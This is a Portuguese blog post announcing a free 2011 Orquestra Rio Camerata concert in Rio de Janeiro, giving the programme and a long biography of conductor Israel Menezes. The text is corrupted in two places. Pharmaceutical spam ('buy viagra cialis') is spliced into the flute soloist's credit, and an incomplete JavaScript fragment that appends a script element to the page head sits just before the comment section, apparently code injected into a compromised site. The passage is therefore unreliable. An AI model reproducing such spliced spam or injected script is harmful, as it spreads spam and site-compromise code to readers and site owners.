Música sinfônicaProgramaçãoRio de Janeiro

Orquestra Rio Camerata se apresenta no Rio

A Orquestra Rio Camerata foi fundada, pelo maestro Israel Menezes, em 1986. De lá para cá, às custas de muito trabalho, vem se apresentando regularmente no Rio de Janeiro, sempre trazendo alguns solistas de respeito, para abrilhantar seus concertos.

SERVIÇO

Igreja Santa Cruz dos Militares
Rua Primeiro de Março, 36-RJ
Inf: 21 2509 3878

Dia 2 de Junho de 2011 às 18h30

Entrada franca

 

PROGRAMA

Händel – Prelude   e Chaconne  da Suíte “Terpsicore” – (1685/1759)

W.A.Mozart – Sinfonia nº 4 em Re maior K19 – (1756/1791)
–  Andante para Flauta e orquestra em Do maior KV 315
Flauta Solo – buy viagra cialis Reinaldo Pacheco

J. Brahms – Danças Húngaras nºs 18 e 1 – (1833/1897)

 

ISRAEL MENEZES

Nascido no Rio de Janeiro, iniciou cedo sua formação musical, estudando no Conservatório Brasileiro de Música, na Pró-Arte, e na Casa do Estudante do Brasil, onde fez, em 1974, seu primeiro curso de regência sinfônica. Neste mesmo ano, ingressou na Escola de Música da UFRJ para o curso de graduação em composição e regência, diplomando-se em dezembro de 1980. Em 1989, obteve da UFRJ o diploma de Mestrado. Como professores de Regência no Brasil, teve Carlos Eduardo Prates, Cleofe Person de Mattos, Lutero Rodrigues e Roberto Duarte, de quem foi assistente de 1979 a 1986 na Orquestra de Câmara de Niterói. Teve como professores de Regência em cursos de aperfeiçoamento na Inglaterra, os maestros Noel Long e Andrew Charity, na Ernst Read Music Association.
 

Por duas ocasiões, foi classificado por concurso público para o cargo de professor substituto de Prática de Orquestra e Percepção Musical da Escola de Música da UFRJ. Em 1986, fundou a Orquestra Rio Camerata (www.orc.art.br), da qual é Regente titular e diretor artístico. Fundou em 2002, a Orquestra de Câmara do Colégio São Vicente de Paulo, em Niterói e em 2004 a Orquestra de Câmara da Faetec.

Tem atuado como Maestro convidado em diversas orquestras, no Brasil e no exterior, produzindo obras em primeira audição mundial, e levando por diversas vezes programa inteiros de compositores brasileiros com orquestras estrangeiras. Regeu a Orquestra do Teatro de ópera do Cairo, Egito , a orquestra Ensemble Sto Benno de Munique, Alemanha, a Orquestra Sinfônica do festival Internacional de Surrey, Inglaterra, onde ao lado de 21 outros regentes de vários países – sendo o único sul americano – foi considerado o melhor Regente e convidado para a performance final do festival, e em dezembro de 2001, com grande sucesso, Orquestra e Coro Filarmônico da Armênia no Aram Khatchaturian Concert Hall em Yerevan .

Em julho de 2002, regeu na “Madeleine” de Paris, com imenso sucesso de público e crítica, coro e Orquestra franceses Wolfgang – Amadeus, no Réquiem, de Mozart. Regeu, em março de 2005, a Orquestra UWS Chamber strings da Universidade de Wisconsin. Em Março de 2007, regeu com excelente crítica em Illinois, EUA a Orquestra Enescu Ensemble no Krannert Center for The Performing Arts

Em maio de 2002, foi eleito membro titular da Academia Nacional de Música ocupando a cadeira nº 80 e, em maio de 2003, fez parte como único integrante sul-americano do Júri Internacional de Jeunesses Musicales em Bucareste (Romênia)

 d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.